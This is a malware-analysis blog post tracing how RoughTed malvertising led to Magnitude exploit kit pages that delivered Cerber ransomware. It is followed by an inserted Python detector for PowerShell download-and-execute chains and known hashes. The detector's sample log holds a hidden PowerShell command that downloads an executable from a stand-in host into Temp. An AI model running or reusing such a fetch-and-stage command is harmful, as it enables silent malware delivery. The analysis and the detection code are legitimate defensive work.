Magnitude EK via RoughTed drops Cerber Ransomware


In my previous blog post I found Rig EK via the RoughTed malvertising operation. I saw in the MalwareBytes article that it also redirected to Magnitude EK. Curious to find it, I set my lab up for Magnitude and went looking for it. It only took about 5 minutes.

I wonder what else RoughTed leads to apart from that which has been listed.

Background Information:

  • Article from RSA: although it is a few months old and missing some newer aspects of Magnitude, the fundamentals have not changed.

  • A few previous Magnitude EK posts from me.

Multiple Magnitude EK drops Cerber Ransomware Samples

Magnitude EK delivers Cerber

  • An article regarding RoughTed Malvertising:

Downloads (in password protected zip)

Details of infection chain:



Magnitude EK via RoughTed malvertising drops Cerber

Full Details:

This flow began with “RoughTed”. This is a malvertising operation reported on by MalwareBytes recently. Other than the initial starting point, everything else seemed fairly normal.

I have detailed Magnitude EK in previous posts so please refer to the “background information” section above for more info.

This time though I had a double landing page which opened in a separate window. I only saw Powershell commands in processes for both “a.exe” and “b.exe“. In this flow, “b.exe” was downloaded successfully and ran, which I have not seen before. The Scriptlet also failed to create a payload.

Below is a screenshot of what happens when the Flash file runs. It appears to generate a URL that is met with a 404; however, another URL is requested to download a payload that exploits CVE-2015-2426 and in this case allows Magnitude to run Powershell commands, which were successful.


The Cerber binary had a reasonably high number of detections:

SHA256: 60e2b83d21c39f78d1612c2f5a06a943d8b6cc51c1f4a51312b85dff414f4e76
File name: b.exe
Detection ratio: 19 / 61
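As an added example (not code from the original post, and not from any of the tools mentioned), here is a small defender-side pass over constructed process and file-creation log lines. It flags the behaviour described above, Powershell spawned from a browser context that pulls a single-letter .exe into Temp, and matches any dropped-file hash against a known-IoC list. The only real indicator in it is the Cerber SHA256 quoted in this post; the log format, field names, timestamps, paths and the example.invalid URLs are all constructed for illustration.

```python
"""Added example: flag download-and-execute PowerShell chains and known-bad
hashes in constructed key=value log lines. Log lines, paths and URLs are made
up; only the Cerber SHA256 comes from the post."""
import re
from dataclasses import dataclass

# Known-bad hashes; the one entry here is the b.exe SHA256 quoted in the post.
KNOWN_BAD_SHA256 = {
    "60e2b83d21c39f78d1612c2f5a06a943d8b6cc51c1f4a51312b85dff414f4e76": "Cerber (b.exe)",
}

# Signals that a PowerShell command line is downloading and staging a payload.
DOWNLOAD_CMDLETS = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer", re.I)
HIDDEN_FLAGS = re.compile(
    r"-(?:w|win|windowstyle)\s+hidden|-nop\b|-noni\b|-enc\b", re.I)
TEMP_EXE = re.compile(r"\\Temp\\[a-z]\.exe", re.I)      # e.g. ...\Temp\a.exe, ...\Temp\b.exe
BROWSER_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "plugin-container.exe"}

# key=value fields, with double-quoted values allowed (constructed format).
FIELD = re.compile(r'(\w+)=("([^"]*)"|\S+)')


@dataclass
class Finding:
    line_no: int
    reason: str


def parse_line(line):
    """Parse one constructed log line into a dict of field -> value."""
    fields = {}
    for key, raw, quoted in FIELD.findall(line):
        fields[key] = quoted if raw.startswith('"') else raw
    return fields


def analyze(lines):
    """Return a Finding for each suspicious PowerShell launch or known-bad file hash."""
    findings = []
    for n, line in enumerate(lines, 1):
        ev = parse_line(line)
        if ev.get("event") == "ProcessCreate" and ev.get("image", "").lower() == "powershell.exe":
            cmd = ev.get("cmdline", "")
            parent = ev.get("parent", "").lower()
            reasons = []
            if parent in BROWSER_PARENTS:
                reasons.append(f"powershell spawned by browser process {parent}")
            if DOWNLOAD_CMDLETS.search(cmd):
                reasons.append("download cmdlet in command line")
            if HIDDEN_FLAGS.search(cmd):
                reasons.append("hidden/non-interactive flags")
            if TEMP_EXE.search(cmd):
                reasons.append("single-letter .exe staged in Temp")
            # Require two independent signals so an admin fetching a file
            # interactively with Invoke-WebRequest is not flagged on its own.
            if len(reasons) >= 2:
                findings.append(Finding(n, "; ".join(reasons)))
        elif ev.get("event") == "FileCreate":
            digest = ev.get("sha256", "").lower()
            if digest in KNOWN_BAD_SHA256:
                findings.append(Finding(n, f"known IoC hash: {KNOWN_BAD_SHA256[digest]}"))
    return findings


# Constructed sample telemetry: one benign launch, one browser-spawned
# download-and-execute, one dropped file with the post's hash, one admin fetch.
SAMPLE_LOG = [
    r'ts=T1 event=ProcessCreate parent=explorer.exe image=powershell.exe cmdline="powershell.exe Get-Process"',
    r'ts=T2 event=ProcessCreate parent=iexplore.exe image=powershell.exe cmdline="powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile(\'http://ad-redirect.example.invalid/x\',\'C:\Users\lab\AppData\Local\Temp\a.exe\')"',
    r'ts=T3 event=FileCreate image=powershell.exe path="C:\Users\lab\AppData\Local\Temp\b.exe" sha256=60e2b83d21c39f78d1612c2f5a06a943d8b6cc51c1f4a51312b85dff414f4e76',
    r'ts=T4 event=ProcessCreate parent=cmd.exe image=powershell.exe cmdline="powershell Invoke-WebRequest https://intranet.example.invalid/report.csv -OutFile report.csv"',
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason}")
```

The two-signal threshold is the design choice worth noting: a browser parent, a download cmdlet, hidden-window flags and a single-letter executable in Temp are each weak alone but, as in this flow, they co-occur during a drive-by chain; the hash match is kept as a separate, exact indicator.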

I only noticed one change in this Cerber and that was the ransom note said (and no typo) “Hi, I’am CERBER RANSOMWARE :)” which I’m fairly sure I have not seen before.


